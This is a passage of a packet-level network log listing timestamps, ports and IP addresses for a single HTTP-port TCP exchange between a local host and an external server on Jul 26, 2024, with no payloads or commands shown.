Jul 26, 2024 12:57:49.042159081 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.042165995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.042165995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.042185068 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.042197943 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.078389883 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.078448057 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.078514099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.078547955 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.078629017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.078660965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.078694105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.078727961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.078732014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.078732014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.078732014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.078732014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.078759909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.078772068 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.130877972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.130959988 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.130995035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131027937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131042004 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131062031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131098032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131109953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131215096 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131218910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131253004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131280899 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131285906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131323099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131373882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131458998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131561995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131593943 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131608963 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131627083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131638050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131660938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131670952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131694078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131702900 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131726027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131737947 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131759882 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131768942 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131793022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131803036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131828070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.131834984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.131874084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132173061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132205963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132215023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132237911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132246017 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132272005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132280111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132304907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132313013 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132354975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132363081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132389069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132397890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132421970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132430077 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132455111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132463932 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132502079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132518053 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132559061 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.132859945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132893085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132925034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132958889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.132992029 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133019924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133025885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133058071 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133059978 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133083105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133095980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133104086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133136988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133420944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133454084 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133476019 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133487940 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133495092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133522034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133533955 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133555889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133569956 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133588076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133600950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133621931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133634090 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133656025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133667946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133692980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.133701086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.133738995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134164095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134197950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134215117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134231091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134239912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134265900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134275913 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134299994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134318113 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134335041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134347916 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134368896 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134382010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134401083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134413958 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134434938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134448051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134468079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134480953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134501934 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134514093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134535074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134547949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134567976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.134579897 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134613037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.134975910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135019064 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135026932 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135061026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135097027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135130882 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135145903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135164022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135173082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135196924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135206938 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135229111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135241985 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135263920 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135274887 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135296106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135309935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135329962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135344982 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135363102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135374069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135396004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135409117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135428905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.135441065 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.135473967 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136009932 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136045933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136060953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136077881 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136085987 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136111975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136125088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136145115 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136157036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136178970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136190891 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136212111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136224031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136245966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136256933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136279106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136291981 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136312962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136323929 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136346102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136358976 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136379957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136390924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136411905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136425018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136446953 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.136456966 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.136496067 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.138711929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.138763905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.138765097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.138796091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.138808012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.138829947 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.138842106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.138861895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.138875961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.138895988 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.138907909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.138927937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.138943911 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.138972998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.138998032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139030933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139046907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139070988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139075041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139120102 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139128923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139162064 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139174938 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139194965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139206886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139228106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139240980 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139264107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139275074 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139300108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139312029 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139333010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.139344931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.139378071 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.173785925 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.173823118 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.173856974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.173865080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.173885107 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.173902035 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.174218893 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.174254894 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.174272060 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.174288034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.174293995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.174323082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.174335003 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.174370050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228319883 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228458881 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228530884 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228565931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228588104 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228598118 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228616953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228630066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228650093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228676081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228683949 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228717089 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228730917 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228750944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228761911 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228799105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228919983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228951931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.228974104 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.228986025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229000092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229033947 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229192019 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229226112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229243040 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229264021 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229274988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229298115 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229315042 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229331970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229346037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229363918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229381084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229398012 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229409933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229446888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229605913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229659081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229756117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229804993 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229839087 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229871988 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.229895115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229919910 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.229990959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230022907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230041027 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230056047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230082989 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230107069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230205059 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230237961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230256081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230273962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230302095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230307102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230329037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230357885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230602980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230637074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230657101 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230669975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230686903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230703115 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230721951 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230736971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230758905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230768919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230784893 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230803013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230823040 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230835915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230854988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230870008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.230890989 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.230917931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231204033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231236935 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231256962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231270075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231287003 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231302977 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231318951 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231336117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231349945 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231369972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231383085 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231404066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231417894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231436968 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231456041 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231471062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231483936 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231503963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231518030 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231539011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.231551886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.231590986 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.232011080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.232043028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.232069016 CEST	60836	80	192.168.2.6	198.46.178.145
